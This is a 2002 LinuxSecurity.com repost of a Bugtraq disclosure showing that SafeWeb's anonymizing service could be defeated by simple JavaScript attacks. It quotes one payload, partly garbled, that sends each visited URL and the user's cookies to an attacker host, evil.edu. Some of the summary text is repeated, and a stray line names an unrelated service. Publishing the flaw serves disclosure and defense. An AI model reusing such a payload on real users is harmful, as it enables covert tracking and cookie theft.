Alerts This Week
Warning Icon 1 677
Alerts This Week
Warning Icon 1 677

Stay Ahead With Linux Security News

Filter Icon Refine news
X Clear Filters
X Clear Filters
View More

Get the latest News and Insights

Get the latest Linux and open source security news straight to your inbox.

Community Poll

What got you started with Linux?

No answer selected. Please try again.
Please select either existing option or enter your own, however not both.
Please select minimum {0} answer(s).
Please select maximum {0} answer(s).
/main-polls/150-what-got-you-started-with-linux?task=poll.vote&format=json
150
radio
0
[{"id":483,"title":"Self-taught through trial and error","votes":545,"type":"x","order":1,"pct":78.42,"resources":[]},{"id":484,"title":"Formal training or courses","votes":30,"type":"x","order":2,"pct":4.32,"resources":[]},{"id":485,"title":"A job that required it","votes":34,"type":"x","order":3,"pct":4.89,"resources":[]},{"id":486,"title":"Other","votes":86,"type":"x","order":4,"pct":12.37,"resources":[]}] ["#ff5b00","#4ac0f2","#b80028","#eef66c","#60bb22","#b96a9a","#62c2cc"] ["rgba(255,91,0,0.7)","rgba(74,192,242,0.7)","rgba(184,0,40,0.7)","rgba(238,246,108,0.7)","rgba(96,187,34,0.7)","rgba(185,106,154,0.7)","rgba(98,194,204,0.7)"] 350
bottom 200
Loading...

Explore Latest Linux Security news

We found -4 articles for you...
81

SafeWeb Anonymity Service Faces JavaScript Exploits and Risks

Although SafeWeb's Web anonymizing service has been shut down since December, they claimed it was the "most widely used online privacy service in the world". .. Andrew Schulman and I have just finished a technical report detailing SafeWeb's catastrophic failures under the simplest of JavaScript attacks by Web sites or firewalls (e.g., by redirecting to a page containing the exploit).. . .. Although SafeWeb's Web anonymizing service has been shut down since December, they claimed it was the "most widely used online privacy service in the world"... Andrew Schulman and I have just finished a technical report detailing SafeWeb's catastrophic failures under the simplest of JavaScript attacks by Web sites or firewalls (e.g., by redirecting to a page containing the exploit). Date: Mon, 11 Feb 2002 21:13:27 -0500 From: David Martin To: bugtraq@ Subject: Deanonymizing SafeWeb Users Although SafeWeb's Web anonymizing service has been shut down since December, they claimed it was the "most widely used online privacy service in the world". SafeWeb licensed their technology to PrivaSec, who is currently running the technology in a preview program for a planned subscription service. They also licensed it to the CIA. Andrew Schulman and I have just finished a technical report detailing SafeWeb's catastrophic failures under the simplest of JavaScript attacks by Web sites or firewalls (e.g., by redirecting to a page containing the exploit). An example (really one long line): self['window']['top'].frames[0]['cookie_munch'] = Function('i=new Image(1,1);i.s'+'rc=" cation"].URL_text.value+(new Date()).getTime()+document.cookie;'); This is spyware. Any Web page containing this JavaScript makes the SafeWeb browser silently report every URL visited to the attacker at evil.edu, along with a copy of all of the persistent cookies previously established through SafeWeb. It works regardless of the user's security settings (recommended vs paranoid mode, etc.) This attack is the only one we describe that depends on thebrowser: it works in Netscape 6.x and probably previous versions, but not IE. We have an attack that does basically the same thing and works in IE too, but it's a bit longer. Since our attacks are just JavaScript, they probably don't depend on the OS of the victim. Basically, using the SafeWeb privacy service helps keep user identities out of routinely gathered log files, but it creates serious new risks for anyone an adversary might bother to actually target. You have to wonder whether this is a good tradeoff. After all, in the absence of serious bugs, Web browsers generally prevent Web sites from silently depositing spyware or snarfing all of the user's cookies. One thing is clear: most users in the intended market for this system had no idea that this system brought any risks with it. For the full report (23 pages, PDF): We've been in touch with SafeWeb since October, and with PrivaSec for about a month now. Some related problems in SafeWeb involving JavaScript spilling IP addresses have been noted here (by Alexander Yezhov) and in alt.privacy.anon-server (by Paul Rubin). Our paper adds spyware, cookie snarfing, and the essential equivalence between SafeWeb's "paranoid" and "recommended" modes of operation to the list of problems with SafeWeb's technology. David Martin Andrew Schulman . WebGuard's privacy platform faces challenges from HTML script vulnerabilities and session hijacking threats identified in our analysis.. Privacy Service, JavaScript Attacks, Cookie Exploitation. . LinuxSecurity.com Team

Calendar 2 Feb 14, 2002 User Avatar LinuxSecurity.com Team Privacy
News Add Esm H340

Get the latest News and Insights

Get the latest Linux and open source security news straight to your inbox.

Community Poll

What got you started with Linux?

No answer selected. Please try again.
Please select either existing option or enter your own, however not both.
Please select minimum {0} answer(s).
Please select maximum {0} answer(s).
/main-polls/150-what-got-you-started-with-linux?task=poll.vote&format=json
150
radio
0
[{"id":483,"title":"Self-taught through trial and error","votes":545,"type":"x","order":1,"pct":78.42,"resources":[]},{"id":484,"title":"Formal training or courses","votes":30,"type":"x","order":2,"pct":4.32,"resources":[]},{"id":485,"title":"A job that required it","votes":34,"type":"x","order":3,"pct":4.89,"resources":[]},{"id":486,"title":"Other","votes":86,"type":"x","order":4,"pct":12.37,"resources":[]}] ["#ff5b00","#4ac0f2","#b80028","#eef66c","#60bb22","#b96a9a","#62c2cc"] ["rgba(255,91,0,0.7)","rgba(74,192,242,0.7)","rgba(184,0,40,0.7)","rgba(238,246,108,0.7)","rgba(96,187,34,0.7)","rgba(185,106,154,0.7)","rgba(98,194,204,0.7)"] 350
bottom 200
Your message here